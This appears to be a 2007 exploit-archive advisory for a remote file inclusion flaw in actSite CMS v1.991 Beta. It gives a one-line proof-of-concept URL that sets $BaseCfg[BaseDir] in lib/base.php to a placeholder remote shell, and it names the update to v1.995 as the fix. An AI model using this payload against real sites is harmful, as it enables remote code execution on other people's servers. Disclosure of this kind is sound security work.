actSite 1.991 Beta (base.php) Remote File Inclusion Vulnerability

2007-10-01 00:00:00

\#'#/

(-.-)

---------------------oOO---(_)---OOo--------------------

| actSite v1.991 Beta (base.php) Remote File Inclusion |

| coded by DNX |

--------------------------------------------------------

[!] Discovered: DNX

[!] Vendor: http://www.actsite.de

[!] Detected: 02.09.2007

[!] Reported: 02.09.2007

[!] Remote: yes



[!] Background: actSite is a content management system based on PHP and MySQL



[!] Bug: $BaseCfg[BaseDir] in lib/base.php



[!] PoC:

- http://[site]/[path]/lib/base.php?BaseCfg[BaseDir]=[shell]



[!] Solution: Install update to v1.995

#

Fixes

No fixes

In order to submit a new fix you need to be registered.